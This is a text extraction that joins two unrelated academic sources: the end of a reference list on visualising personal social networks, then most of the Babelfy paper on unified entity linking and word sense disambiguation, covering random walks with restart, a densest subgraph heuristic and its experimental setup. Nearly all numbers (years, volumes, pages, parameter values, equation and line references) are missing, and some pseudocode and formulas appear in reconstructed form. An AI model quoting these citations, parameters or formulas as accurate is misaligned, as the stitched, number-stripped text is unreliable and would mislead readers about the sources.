local belonging and ‘geog- raphies of emotions’: immigrant children’s experience of their neighbourhoods in paris and berlin. childhood, ( ): – . domínguez, s. and maya-jariego, i. ( ). acculturation of host individuals: immigrants and personal networks. american journal of community psychology, ( ): – . dunbar, r. i. m. and spoors, m. ( ). social net- works, support cliques, and kinship. human nature, ( ): – . eddens, k. and fagan, j. m. ( ). comparing nascent approaches for gathering alter-tie data for egocentric studies. social networks, : – . eddens, k., fagan, j. m. and collins, t. ( ). an interactive, mobile-based tool for personal social network data collection and visualization among a geographically isolated and socioeconomically disad- vantaged population: early-stage feasibility study with qualitative user feedback. jmir research protocols, ( ): e . fischer, c. s. ( ), to dwell among friends: per- sonal networks in town and city, university of chicago press, chicago, il. freeman, l. c. ( ). visualizing social networks. journal of social structure, ( ). freeman, l. c. ( ). the development of social network analysis. a study in the sociology of science. empirical press, vancouver, bc. fu, y. c. ( ). measuring personal networks with daily contacts: a single-item survey question and the contact diary. social networks, ( ): – . gamper, m., schönhuth, m. and kronenwett, m. ( ). bringing qualitative and quantitative data together: collecting network data with the help of the software tool vennmaker. in safar, m. and mahdi, k. (eds), social networking and community behavior modeling: qualitative and quantitative measures, hershley, pa: – . bielefeld (germany). hersberger, j. ( ). a qualitative approach to ex- amining information transfer via social networks among homeless populations. the new review of information behaviour research, ( ): – . hogan, b., carrasco, j. a. and wellman, b. ( ). visualizing personal networks: working with partici- pant-aided sociograms. field methods, ( ): – . kahn, r. l. and antonucci, t. ( ). supports of the elderly: family/friends/professionals. final report to the national institute on aging bethesda, md. killworth, p. d., johnsen, e. c., bernard, h. r., ann shelley, g. and mccarty, c. ( ). estimating the size of personal networks. social networks, ( ): – . lubbers, m. j., molina, j. l. and mccarty, c. ( ). personal networks and ethnic identifications. international sociology, ( ): – . mccallister, l. and fischer, c. s. ( ). a proce- dure for surveying personal networks. sociological methods & research, ( ): – . connections mccarty, c. ( ). structure in personal networks. journal of social structure, ( ). mccarty, c. and govindaramanujam, s. ( ). a modified elicitation of personal networks using dynamic visualization. connections, ( ): – . mccarty, c., killworth, p. d., bernard, r., johnsen, e. c. and shelley, g. a. ( ). comparing two meth- ods for estimating network size. human organization, ( ): – . mccarty, c., molina, j. l., aguilar, c. and rota, l. ( ). a comparison of social network mapping and personal network visualization. field methods, ( ): – . marin, a. ( ). are respondents more likely to list alters with certain characteristics? implications for name generator data. social networks, ( ): – . marin, a. and hampton, k. n. ( ). simplifying the personal network name generator. field methods, ( ): – . maya jariego, i. and holgado, d. ( ). 
lazos fuertes y proveedores múltiples de apoyo: com- paración de dos formas de representación gráfica de las redes personales. empiria: revista de metodología de ciencias sociales, : – . maya-jariego, i. ( ). usos del análisis de redes en la intervención comunitaria. redes. revista his- pana para el análisis de redes sociales, ( ): – . maya jariego, i. ( ). why name generators with a fixed number of alters may be a pragmatic option for personal network analysis. american journal of com- munity psychology, ( – ): – . maya-jariego, i., & armitage, n. ( ). multiple senses of community in migration and commuting: the interplay between time, space and relations. interna- tional sociology, ( ): – . maya-jariego, i. ( ). sentido de comunidad y potenciación comunitaria. apuntes de psicología, ( ): – . brass, d., labianca, g., mehra, a., halgin, d., and borgatti, s. p. ( ). imaginary worlds: using visual network scales to capture perceptions of social net- works. contemporary perspectives on organizational social networks, emerald group publishing: – . bradford (united kingdom). milardo, r. m. ( ). comparative methods for delineating social networks. journal of social and per- sonal relationships, ( ): – . moreno, j. l. ( ). who shall survive? a new ap- proach to the problem of human interrelations. nervous and mental disease monograph series no , nervous and mental disease publishing, washington, dc. moreno, j. l. ( ). who shall survive? foun- dations of sociometry, group psychotherapy and socio-drama, nd ed., beacon house, oxford. pearce, j. and milne, e. j. ( ). participation and community on bradford’s traditionally white estates: a community research project. available at: http://www. jrf.org.uk/sites/files/jrf/bradford-participation-commu- nity-full.pdf. retrieved: december , . pool, i. s. and kochen, m. ( ). contacts and influence. social networks, ( ): – . ratti, c., frenchman, d., pulselli, r. m., and williams, s. ( ). mobile landscapes: using location data from cell phones for urban analysis. environment and planning b: planning and design, ( ): – . reyes, c. ( ). eliciting data on social relation- ships: the use of hand-drawn network maps in tracing the perception of digitally mediated social ties. interna- tional review of social research, ( ): – . roberts, s. g. b., dunbar, r. i. m., pollet, t. v. and kuppens, t. ( ). exploring variation in active net- work size: constraints and ego characteristics. social networks, ( ): – . roberts, s. g. b., wilson, r., fedurek, p. and dunbar, r. i. m. ( ). individual differences and per- sonal social network size and structure. personality and individual differences, ( ): – . ryan, l. and d’angelo, a. ( ). changing times: migrants’ social network analysis and the challenges of longitudinal research. social networks, : – . ryan, l., mulholland, j. and agoston, a. ( ). talk- ing ties: reflecting on network visualisation and qualitative interviewing. sociological research online, ( , avail- able at http://www.socresonline.org.uk/ / / .html. retrieved: december , . samuelsson, m., thernlund, g. and ringstrom, j. ( ). using the five field map to describe the social network of children: a methodological study. internation- al journal of behavioral development, ( ): – . schiffer, e. and hauck, j. ( ). net-map: collecting social network data and facilitating network learning through participatory influence network map- ping. field methods, ( ): – . schönhuth, m., kronenwett, m., gamper, m. and stark, m. ( ). vennmaker . . 
available at http:// www.vennmaker.com retrieved: december , . tubaro, p., casilli, a. a. and mounier, l. ( ). elic- iting personal network data in web surveys through participant-generated sociograms. field methods, ( ): – . van der poel, m. g. m. ( ). delineating personal support networks. social networks, ( ): – . what the eye does not see: visualizations strategies for the data collection of personal network vehovar, v., lozar manfreda, k., koren, g. and hlebec, v. ( ). measuring ego-centered social net- works on the web: questionnaire design issues. social networks, ( ): – . von der lippe, h., & gamper, m. ( ). drawing or tabulating ego-centered networks? a mixed-methods comparison of questionnaire vs. visualization-based data collection. international journal of social re- search methodology, ( ): – . wellman, b. ( ). the community question: the intimate networks of east yorkers. american journal of community psychology, ( ): – . wellman, b. ( ). the network is personal: intro- duction to a special issue of social networks. social networks, ( ): – . wellman, b. and wortley, s. ( ). different strokes from different folks: community ties and social support. american journal of sociology, ( ): – . entity linking meets word sense disambiguation: a unified approach entity linking meets word sense disambiguation: a unified approach andrea moro, alessandro raganato, roberto navigli dipartimento di informatica, sapienza università di roma, viale regina elena , roma, italy {moro,navigli}@di.uniroma .it ale.raganato@gmail.com abstract entity linking (el) and word sense disam- biguation (wsd) both address the lexical am- biguity of language. but while the two tasks are pretty similar, they differ in a fundamen- tal respect: in el the textual mention can be linked to a named entity which may or may not contain the exact mention, while in wsd there is a perfect match between the word form (bet- ter, its lemma) and a suitable word sense. in this paper we present babelfy, a unified graph-based approach to el and wsd based on a loose identification of candidate mean- ings coupled with a densest subgraph heuris- tic which selects high-coherence semantic in- terpretations. our experiments show state-of- the-art performances on both tasks on differ- ent datasets, including a multilingual setting. babelfy is online at http://babelfy.org introduction the automatic understanding of the meaning of text has been a major goal of research in computational linguistics and related areas for several decades, with ambitious challenges, such as machine read- ing (etzioni et al., ) and the quest for knowl- edge (schubert, ). word sense disambiguation (wsd) (navigli, ; navigli, ) is a historical task aimed at assigning meanings to single-word and multi-word occurrences within text, a task which is more alive than ever in the research community. recently, the collaborative creation of large semi- structured resources, such as wikipedia, and knowl- edge resources built from them (hovy et al., ), such as babelnet (navigli and ponzetto, a), dbpedia (auer et al., ) and yago (hoffart et al., ), has favoured the emergence of new tasks, such as entity linking (el) (rao et al., ), and opened up new possibilities for tasks such as named entity disambiguation (ned) and wikifi- cation. the aim of el is to discover mentions of entities within a text and to link them to the most suitable entry in a reference knowledge base. 
how- ever, in contrast to wsd, a mention may be partial while still being unambiguous thanks to the context. for instance, consider the following sentence: ( ) thomas and mario are strikers playing in munich. this example makes it clear how intertwined the two tasks of wsd and el are. in fact, on the one hand, striker and play are polysemous words which can be disambiguated by selecting the game/soccer playing senses of the two words in a dictionary; on the other hand, thomas and mario are partial men- tions which have to be linked to the appropriate en- tries of a knowledge base, that is, thomas müller and mario gomez, two well-known soccer players. the two main differences between wsd and el lie, on the one hand, in the kind of inventory used, i.e., dictionary vs. encyclopedia, and, on the other hand, in the assumption that the mention is complete or potentially partial. notwithstanding these differ- ences, the tasks are similar in nature, in that they both involve the disambiguation of textual fragments according to a reference inventory. however, the re- search community has so far tackled the two tasks separately, often duplicating efforts and solutions. in contrast to this trend, research in knowledge acquisition is now heading towards the seamless in- transactions of the association for computational linguistics, ( ) – . action editor: noah smith. submitted / ; revised / ; published / . c© association for computational linguistics. tegration of encyclopedic and lexicographic knowl- edge into structured language resources (hovy et al., ), and the main representative of this new direc- tion is undoubtedly babelnet (navigli and ponzetto, a). given such structured language resources it seems natural to suppose that they might provide a common ground for the two tasks of wsd and el. more precisely, in this paper we explore the hy- pothesis that the lexicographic knowledge used in wsd is also useful for tackling the el task, and, vice versa, that the encyclopedic information uti- lized in el helps disambiguate nominal mentions in a wsd setting. we propose babelfy, a novel, uni- fied graph-based approach to wsd and el, which performs two main steps: i) it exploits random walks with restart, and triangles as a support for reweight- ing the edges of a large semantic network; ii) it uses a densest subgraph heuristic on the available seman- tic interpretations of the input text to perform a joint disambiguation with both concepts and named enti- ties. our experiments show the benefits of our syn- ergistic approach on six gold-standard datasets. related work . word sense disambiguation word sense disambiguation (wsd) is the task of choosing the right sense for a word within a given context. typical approaches for this task can be clas- sified as i) supervised, ii) knowledge-based, and iii) unsupervised. however, supervised approaches re- quire huge amounts of annotated data (zhong and ng, ; shen et al., ; pilehvar and navigli, ), an effort which cannot easily be repeated for new domains and languages, while unsupervised ones suffer from data sparsity and an intrinsic diffi- culty in their evaluation (agirre et al., ; brody and lapata, ; manandhar et al., ; van de cruys and apidianaki, ; di marco and nav- igli, ). on the other hand, knowledge-based approaches are able to obtain good performance us- ing readily-available structured knowledge (agirre et al., ; guo and diab, ; ponzetto and nav- igli, ; miller et al., ; agirre et al., ). 
some of these approaches marginally take into ac- count the structural properties of the knowledge base (mihalcea, ). other approaches, instead, lever- age the structural properties of the knowledge base by exploiting centrality and connectivity measures (sinha and mihalcea, ; tsatsaronis et al., ; agirre and soroa, ; navigli and lapata, ). one of the key steps of many knowledge-based wsd algorithms is the creation of a graph repre- senting the semantic interpretations of the input text. two main strategies to build this graph have been proposed: i) exploiting the direct connections, i.e., edges, between the considered sense candidates; ii) populating the graph according to (shortest) paths between them. in our approach we manage to unify these two strategies by automatically creating edges between sense candidates performing random walk with restart (tong et al., ). the recent upsurge of interest in multilinguality has led to the development of cross-lingual and mul- tilingual approaches to wsd (lefever and hoste, ; lefever and hoste, ; navigli et al., ). multilinguality has been exploited in different ways, e.g., by using parallel corpora to build multilingual contexts (guo and diab, ; banea and mihalcea, ; lefever et al., ) or by means of ensemble methods which exploit complementary sense evi- dence from translations in different languages (nav- igli and ponzetto, b). in this work, we present a novel exploitation of the structural properties of a multilingual semantic network. . entity linking entity linking (erbs et al., ; rao et al., ; cornolti et al., ) encompasses a set of similar tasks, which include named entity disambiguation (ned), that is the task of linking entity mentions in a text to a knowledge base (bunescu and pasca, ; cucerzan, ), and wikification, i.e., the automatic annotation of text by linking its relevant fragments of text to the appropriate wikipedia arti- cles. mihalcea and csomai ( ) were the first to tackle the wikification task. in their approach they disambiguate each word in a sentence independently by exploiting the context in which it occurs. how- ever, this approach is local in that it lacks a collective notion of coherence between the selected wikipedia pages. to overcome this problem, cucerzan ( ) introduced a global approach based on the simulta- neous disambiguation of all the terms in a text and the use of lexical context to disambiguate the men- tions. to maximize the semantic agreement milne and witten ( ) introduced the analysis of the se- mantic relations between the candidate senses and the unambiguous context, i.e., words with a single sense candidate. however, the performance of this algorithm depends heavily on the number of links incident to the target senses and on the availabil- ity of unambiguous words within the input text. to overcome this issue a novel class of approaches have been proposed (kulkarni et al., ; ratinov et al., ; hoffart et al., ) that exploit global and local features. however, these systems either rely on a difficult np-hard formalization of the problem which is infeasible for long text, or exploit popular- ity measures which are domain-dependent. in con- trast, we show that the semantic network structure can be leveraged to obtain state-of-the-art perfor- mance by synergistically disambiguating both word senses and named entities at the same time. 
recently, the explosion of on-line social network- ing services, such as twitter and facebook, have contributed to the development of new methods for the efficient disambiguation of short texts (ferrag- ina and scaiella, ; hoffart et al., ; böhm et al., ). thanks to a loose candidate identification technique coupled with a densest subgraph heuristic, we show that our approach is particularly suited for short and highly ambiguous text disambiguation. . the best of two worlds our main goal is to bring together the two worlds of wsd and el. on the one hand, this implies relaxing the constraint of a perfect association between men- tions and meanings, which is, instead, assumed in wsd. on the other hand, this relaxation leads to the inherent difficulty of encoding a full-fledged sense inventory for el. our solution to this problem is to keep the set of candidate meanings for a given men- tion as open as possible (see section ), so as to en- able high recall in linking partial mentions, while providing an effective method for handling this high ambiguity (see section ). a key assumption of our work is that the lexico- graphic knowledge used in wsd is also useful for tackling the el task, and vice versa the encyclopedic information utilized in el helps disambiguate nom- inal mentions in a wsd setting. we enable the joint treatment of concepts and named entities by enforc- ing high coherence in our semantic interpretations. wsd and entity linking together task. our task is to disambiguate and link all nominal and named entity mentions occurring within a text. the linking task is performed by asso- ciating each mention with the most suitable entry of a given knowledge base. we point out that our definition is unconstrained in terms of what to link, i.e., unlike wikification and wsd, we can link overlapping fragments of text. for instance, given the text fragment major league soccer, we identify and disambiguate several dif- ferent nominal and entity mentions: major league soccer, major league, league and soccer. in contrast to el, we link not only named entity mentions, such as major league soccer, but also nominal mentions, e.g., major league, to their corresponding meanings in the knowledge base. babelfy. we provide a unified approach to wsd and entity linking in three steps: . given a lexicalized semantic network, we as- sociate with each vertex, i.e., either concept or named entity, a semantic signature, that is, a set of related vertices (section ). this is a prelim- inary step which needs to be performed only once, independently of the input text. . given a text, we extract all the linkable frag- ments from this text and, for each of them, list the possible meanings according to the seman- tic network (section ). . we create a graph-based semantic interpreta- tion of the whole text by linking the candidate meanings of the extracted fragments using the previously-computed semantic signatures. we then extract a dense subgraph of this represen- tation and select the best candidate meaning for each fragment (section ). semantic network our approach requires the availability of a wide- coverage semantic network which encodes struc- tural and lexical information both of an encyclope- dic and of a lexicographic kind. although in prin- ciple any semantic network with these properties mentions which are not contained in the reference knowl- edge base are not taken into account. could be utilized, in our work we used the babel- net . . 
semantic network (navigli and ponzetto, a) since it is the largest multilingual knowledge base, obtained from the automatic seamless integration of wikipedia and wordnet (fellbaum, ). we consider babelnet as a directed multigraph which contains both concepts and named entities as its vertices and a multiset of semantic relations as its edges. we leverage the multilingual lexicalizations of the vertices of babelnet to identify mentions in the input text. for example, the entity fc bayern munich can be lexicalized in different languages, e.g., f.c. bayern de múnich in spanish, die roten in english and bayern münchen in german, among others. as regards semantic relations, the only information we use is that of the end points, i.e., the vertices that these relations connect, while neglecting the relation type.

building semantic signatures

one of the major issues affecting both manually-curated and automatically constructed semantic networks is data sparsity. for instance, we calculated that the average number of incident edges is roughly in wordnet, in babelnet and in yago , to mention a few. although automatically-built resources typically provide larger amounts of edges, two issues have to be taken into account: concepts which should be related might not be directly connected despite being structurally close within the network, and, vice versa, weakly-related or even unrelated concepts can be erroneously connected by an edge. for instance, in babelnet we do not have an edge between playmaker and thomas müller, while we have an incorrect edge connecting fc bayern munich and yellow submarine (song). however, this crisp notion of relatedness can be overcome by exploiting the global structure of the semantic network, thereby obtaining a more precise and higher-coverage measure of relatedness. we address this issue in two steps: first, we provide a structural weighting of the network's edges; second, for each vertex we create a set of related vertices using random walks with restart (babelnet is available at http://babelnet.org and wikipedia at http://www.wikipedia.org).

structural weighting. our first objective is to assign higher weights to edges which are involved in more densely connected areas of the directed network. to this end, inspired by the local clustering coefficient measure (watts and strogatz, ) and its recent success in word sense induction (di marco and navigli, ), we use directed triangles, i.e., directed cycles of length 3, and weight each edge (v,v′) by the number of directed triangles it occurs in:

weight(v,v′) := |{(v,v′,v′′) : (v,v′),(v′,v′′),(v′′,v) ∈ e}| + 1

we add one to each weight to ensure the highest degree of reachability in the network.

random walk with restart. our goal is to create a semantic signature (i.e., a set of highly related vertices) for each concept and named entity of the semantic network. to do this, we perform a random walk with restart (rwr) (tong et al., ), that is, a stochastic process that starts from an initial vertex of the graph and then, for a fixed number n of steps or until convergence, explores the graph by choosing the next vertex within the current neighborhood or by restarting from the initial vertex with a given, fixed restart probability α. for each edge (v,v′) in the network, we model the conditional probability p(v′|v) as the normalized weight of the edge:

p(v′|v) = weight(v,v′) / Σ_{v′′ ∈ v} weight(v,v′′)

where v is the set of vertices of the semantic network and weight(v,v′) is the function defined in equation .
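to make these two definitions concrete, the following is a minimal python sketch, under our own simplifying assumptions, of how the triangle-based edge weights and the resulting transition probabilities could be computed over a directed graph stored as successor sets; the container layout and the function names are ours and are not taken from the babelfy implementation.

from collections import defaultdict

def triangle_weights(succ):
    """succ maps each vertex to the set of its direct successors in the
    directed network. the weight of an edge (v, v2) is the number of
    directed triangles v -> v2 -> v3 -> v it takes part in, plus one."""
    weights = {}
    for v, outgoing in succ.items():
        for v2 in outgoing:
            closing = sum(1 for v3 in succ.get(v2, ()) if v in succ.get(v3, ()))
            weights[(v, v2)] = closing + 1
    return weights

def transition_probabilities(succ, weights):
    """p(v2 | v) = weight(v, v2) / sum of weight(v, v'') over the successors
    of v (non-edges contribute zero to the normalization)."""
    probs = defaultdict(dict)
    for v, outgoing in succ.items():
        total = sum(weights[(v, v2)] for v2 in outgoing)
        for v2 in outgoing:
            probs[v][v2] = weights[(v, v2)] / total
    return probs

# toy usage on a hypothetical four-vertex network
succ = {"a": {"b", "c"}, "b": {"c"}, "c": {"a"}, "d": {"a"}}
w = triangle_weights(succ)            # e.g. w[("a", "b")] == 2: one triangle a->b->c->a, plus one
p = transition_probabilities(succ, w) # e.g. p["a"]["b"] == 2/3, p["a"]["c"] == 1/3

a walk step would then either sample the next vertex from p(·|v) or restart from the initial vertex with probability α, as described next.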
we then run the rwr from each ver- tex v of the semantic network for a fixed number n of steps (we show in algorithm our rwr pseu- docode). we keep track of the encountered ver- tices using the map counts, i.e., we increase the counter associated with vertex v′ in counts every time we hit v′ during a rwr started from v (see line ). as a result, we obtain a frequency distri- bution over the whole set of concepts and entities. to eliminate weakly-related vertices we keep only those items that were hit at least η times (see lines – ). finally, we save the remaining vertices in the set semsignv which is the semantic signature of v (see line ). rwr can be used with an initial set of vertices, however in this paper we use a single initial vertex. algorithm random walk with restart. : input: v, the starting vertex; α, the restart probability; n, the number of steps to be executed; p , the transition probabilities; η, the frequency threshold. : output: semsignv, set of related vertices for v. : function rwr(v,α,n,p,η) : v′ := v : counts := new map < synset,integer > : while n > do : if random() > α then : given the transition probabilities p(·|v′) : of v′, choose a random neighbor v′′ : v′ := v′′ : counts[v′] + + : else : restart the walk : v′ := v : n := n− : for each v′ in counts.keys() do : if counts[v′] < η then : remove v′ from counts.keys() : return semsignv = counts.keys() the creation of our set of semantic signatures, one for each vertex in the semantic network, is a prelim- inary step carried out once only before starting pro- cessing any input text. we now turn to the candidate identification and disambiguation steps. candidate identification given a text as input, we apply part-of-speech tag- ging and identify the set f of all the textual frag- ments, i.e., all the sequences of words of maximum length five, which contain at least one noun and that are substrings of lexicalizations in babelnet, i.e., those fragments that can potentially be linked to an entry in babelnet. for each textual fragment f ∈ f , i.e., a single- or multi-word expression of the input text, we look up the semantic network for candidate meanings, i.e., vertices that contain f or, only for named entities, a superstring of f as their lexical- ization. for instance, for sentence ( ) in the intro- duction, we identify the following textual fragments: thomas, mario, strikers, munich. this output is ob- tained thanks to our loose candidate identification routine, i.e., based on superstring matching instead of exact matching, which, for instance, enables us to recognize the right candidate mario gomez for the mention mario even if this named entity does not have mario as one of its lexicalizations (for an anal- ysis of the impact of this routine against the exact matching approach see the discussion in section ). moreover, as we stated in section , we allow overlapping fragments, e.g., for major league we recognize league and major league. we denote with cand(f) the set of all the candidate meanings of fragment f. for instance, for the noun league we have that cand(league) contains among others the sport word sense and the tv series named entity. candidate disambiguation semantic interpretation graph. after the identi- fication of fragments (f ) and their candidate mean- ings (cand(·)), we create a directed graph gi = (vi,ei) of the semantic interpretations of the input text. we show the pseudocode in algorithm . 
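for concreteness, before the graph construction is detailed, the loose candidate identification just described can be sketched as follows; the pos-tag convention, the lexicon interface and all helper names are simplifying assumptions introduced here for illustration and do not correspond to the actual babelnet api.

import itertools

def candidate_fragments(tokens, pos_tags, lexicon, max_len=5):
    """enumerate all (possibly overlapping) word sequences of length <= max_len
    that contain at least one noun and are substrings of some lexicalization."""
    fragments = []
    for start, length in itertools.product(range(len(tokens)), range(1, max_len + 1)):
        end = start + length
        if end > len(tokens):
            continue
        if not any(tag.startswith("NN") for tag in pos_tags[start:end]):
            continue  # the fragment must contain at least one noun
        surface = " ".join(tokens[start:end])
        if lexicon.is_substring_of_lexicalization(surface):  # hypothetical lookup
            fragments.append((start, end, surface))
    return fragments

def candidate_meanings(fragment, lexicon):
    """cand(f): synsets with a lexicalization equal to f, plus named entities
    whose lexicalization has f as a substring (loose, superstring matching)."""
    exact = set(lexicon.synsets_by_lexicalization(fragment))
    loose = {s for s in lexicon.synsets_with_lexicalization_containing(fragment)
             if lexicon.is_named_entity(s)}
    return exact | loose

overlapping fragments are naturally allowed by such an enumeration, since every qualifying span is considered independently.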
vi contains all the candidate meanings of all fragments, that is, vi := {(v,f) : v ∈ cand(f), f ∈ f}, where f is a fragment of the input text and v is a candidate babel synset that has a lexicalization which is equal to or is a superstring of f (see lines – ). the set of edges ei connects related meanings and is populated as follows: we add an edge from (v,f) to (v′,f′) if and only if f ≠ f′ and v′ ∈ semsignv (see lines – ). in other words, we connect two candidate meanings of different fragments if one is in the semantic signature of the other. for instance, we add an edge between (mario gomez, mario) and (thomas müller, thomas), while we do not add one between (mario gomez, mario) and (mario basler, mario), since these are two candidate meanings of the same fragment, i.e., mario. in figure , we show an excerpt of our graph for sentence ( ).

figure : an excerpt of the semantic interpretation graph automatically built for the sentence thomas and mario are strikers playing in munich; its vertices include (tomás milián, thomas), (thomas müller, thomas), (forward, striker), (striker, striker), (fc bayern munich, munich), (munich, munich), (mario adorf, mario), (mario basler, mario) and (mario gomez, mario), and the edges connecting the correct meanings are in bold.

at this point we have a graph-based representation of all the possible interpretations of the input text. in order to drastically reduce the degree of ambiguity while keeping the interpretation coherence as high as possible, we apply a novel densest subgraph heuristic (see line ), whose description we defer to the next paragraph. the result is a subgraph which contains those semantic interpretations that are most coherent to each other. however, this subgraph might still contain multiple interpretations for the same fragment, and even unambiguous fragments which are not correct. therefore, the final step is the selection of the most suitable candidate meaning for each fragment f given a threshold θ to discard semantically unrelated candidate meanings. we score each meaning v ∈ cand(f) with its normalized weighted degree in the densest subgraph:

score((v,f)) = w(v,f) · deg((v,f)) / Σ_{v′ ∈ cand(f)} w(v′,f) · deg((v′,f))

where deg(v) denotes the overall number of incoming and outgoing edges of a vertex, i.e., deg(v) := deg+(v) + deg−(v), and w(v,f) is the fraction of fragments the candidate meaning v connects to:

w(v,f) := |{f′ ∈ f : ∃v′ s.t. ((v,f),(v′,f′)) ∈ ei or ((v′,f′),(v,f)) ∈ ei}| / (|f| − 1)

the rationale behind this scoring function is to take into account both the semantic coherence, using a graph centrality measure among the candidate meanings, and the lexical coherence, in terms of the number of fragments a candidate relates to. finally, we link each f to the highest-ranking candidate meaning v* if score((v*,f)) ≥ θ, where θ is a fixed threshold (see lines – of algorithm ). for instance, in sentence ( ) and for the fragment mario we select mario gomez as our final candidate meaning and link it to the fragment.

algorithm candidate disambiguation.
input: f, the fragments in the input text; semsign, the semantic signatures; µ, the ambiguity level to be reached; cand, the mapping from fragments to candidate meanings.
output: selected, the disambiguated fragments.
function disamb(f, semsign, µ, cand)
  vi := ∅; ei := ∅
  gi := (vi, ei)
  for each fragment f ∈ f do
    for each candidate v ∈ cand(f) do
      vi := vi ∪ {(v,f)}
  for each ((v,f),(v′,f′)) ∈ vi × vi do
    if f ≠ f′ and v′ ∈ semsignv then
      ei := ei ∪ {((v,f),(v′,f′))}
  g*i := denssub(f, cand, gi, µ)
  selected := new map<string, synset>
  for each f ∈ f s.t. ∃(v,f) ∈ v*i do
    cand*(f) := {v : (v,f) ∈ v*i}
    v* := arg max_{v ∈ cand*(f)} score((v,f))
    if score((v*,f)) ≥ θ then
      selected(f) := v*
  return selected

linking by densest subgraph. we now illustrate our novel densest subgraph heuristic, used in line of algorithm , for reducing the level of ambiguity of the initial semantic interpretation graph gi. the main idea here is that the most suitable meanings of each text fragment will belong to the densest area of the graph. for instance, in figure the (candidate, fragment) pairs (thomas müller, thomas), (mario gomez, mario), (striker, striker) and (fc bayern munich, munich) form a dense subgraph supporting their relevance for sentence ( ). the problem of identifying the densest subgraph of size at least k is np-hard (feige et al., ). therefore, we define a heuristic for k-partite graphs inspired by a 2-approximation greedy algorithm for arbitrary graphs (charikar, ; khuller and saha, ). our adapted strategy for selecting a dense subgraph of gi is based on the iterative removal of low-coherence vertices, i.e., fragment interpretations. we show the pseudocode in algorithm .

algorithm densest subgraph.
input: f, the set of all fragments in the input text; cand, the mapping from fragments to candidate meanings; gi(0), the full semantic interpretation graph; µ, the ambiguity level to be reached.
output: g*i, a dense subgraph.
function denssub(f, cand, gi(0), µ)
  t := 0
  g*i := gi(0)
  while true do
    fmax := arg max_{f ∈ f} |{v : ∃(v,f) ∈ vi(t)}|
    if |{v : ∃(v,fmax) ∈ vi(t)}| ≤ µ then
      break
    vmin := arg min_{v ∈ cand(fmax)} score((v,fmax))
    vi(t+1) := vi(t) \ {(vmin,fmax)}
    ei(t+1) := ei(t) ∩ (vi(t+1) × vi(t+1))
    gi(t+1) := (vi(t+1), ei(t+1))
    if avgdeg(gi(t+1)) > avgdeg(g*i) then
      g*i := gi(t+1)
    t := t + 1
  return g*i

we start with the initial graph gi(0) at step t = 0 (see line ). for each step t (lines – ), first, we identify the most ambiguous fragment fmax, i.e., the one with the maximum number of candidate meanings in the graph (see line ). next, we discard the weakest interpretation of the current fragment fmax. to do so, we determine the lexical and semantic coherence of each candidate meaning (v,fmax) using formula (see line ). we then remove from our graph gi(t) the lowest-coherence vertex (vmin,fmax), i.e., the one whose score is minimum (see lines – ). for instance, in figure , fmax is the fragment mario: we compute score((mario gomez, mario)), score((mario basler, mario)) and score((mario adorf, mario)), and we remove (mario basler, mario) from the graph since its score is minimum. we then move to the next step, i.e., we set t := t + 1 (see line ) and repeat the low-coherence removal step. we stop when the number of remaining candidates for each fragment is below a threshold µ, i.e., |{v : ∃(v,f) ∈ vi(t)}| ≤ µ for every f ∈ f (see lines – ). during each iteration step t we compute the average degree of the current graph gi(t), i.e., avgdeg(gi(t)) = |ei(t)| / |vi(t)|. finally, we select as the densest subgraph of the initial semantic interpretation graph gi the graph g*i that maximizes the average degree (see lines – ).

experimental setup

datasets. we carried out our experiments on six datasets, four for wsd and two for el:
• the semeval- task dataset for multilingual wsd (navigli et al., ), which consists of documents in different domains, available in languages.
for each language, all noun occurrences were annotated using babelnet, thereby providing wikipedia and wordnet an- notations wherever applicable. the number of mentions to be disambiguated roughly ranges from k to k per language in the different se- tups. • the semeval- task dataset for coarse- grained english all-words wsd (navigli et al., ). we take into account only nominal men- tions obtaining a dataset containing nouns to be disambiguated using wordnet. • the semeval- task dataset for fine- grained english all-words wsd (pradhan et al., ). we considered only nominal mentions resulting in nouns annotated with wordnet synsets. • the senseval- dataset for english all-words wsd (snyder and palmer, ), which con- tains nouns to be disambiguated using wordnet. • kore (hoffart et al., ), which consists of short english sentences (mean length of words) with a total number of mentions manually annotated using yago , for which a wikipedia mapping is available. this dataset was built with the idea of testing against a high level of ambiguity for the el task. • aida-conll (hoffart et al., ), which consists of english articles, for a total of roughly k named entity mentions anno- tated with yago concepts separated in devel- opment, training and test sets. we exploited the pos tags already available in the semeval and senseval datasets, while we used the stanford pos tagger (toutanova et al., ) for the english sentences in the last two datasets. we used aida-conll as it is the most recent and largest available dataset for el (hachey et al., ). the tac kbp datasets are available only to participants. parameters. we fixed the parameters of rwr (section ) to the values α = . , η = and n = m which maximize f on a manually cre- ated tuning set made up of gold-standard seman- tic signatures. we tuned our two disambiguation pa- rameters µ = and θ = . by optimizing f on the trial dataset of the semeval- task on mul- tilingual wsd (navigli et al., ). we used the same parameters on all the other wsd datasets. as for el, we used the training part of aida-conll (hoffart et al., ) to set µ = and θ = . . . systems multilingual wsd. we evaluated our system on the semeval- task by comparing it with the participating systems: • umcc-dlsi (gutiérrez et al., ) a state- of-the-art personalized pagerank-based ap- proach that exploits the integration of different sources of knowledge, such as wordnet do- mains/affect (strapparava and valitutti, ), sumo (zouaq et al., ) and the extended wordnet (mihalcea and moldovan, ); • daebak! (manion and sainudiin, ) which performs wsd on the basis of periph- eral diversity within subgraphs of babelnet; • getalp (schwab et al., ) which uses an ant colony optimization technique together with the classical measure of lesk ( ). we also compared with ukb w w (agirre and soroa, ), a state-of-the-art approach for knowledge-based wsd, based on personalized pagerank (haveliwala, ). we used the same mapping from words to senses that we used in our approach, default parameters and babelnet as the input graph. moreover, we compared our system with ims (zhong and ng, ), a state-of-the- art supervised english wsd system which uses an svm trained on sense-annotated corpora, such as semcor (miller et al., ) and dso (ng and lee, ), among others. we used the ims model out-of-the-box with most frequent sense (mfs) as backoff routine since the model obtained using the task trial data performed worse. 
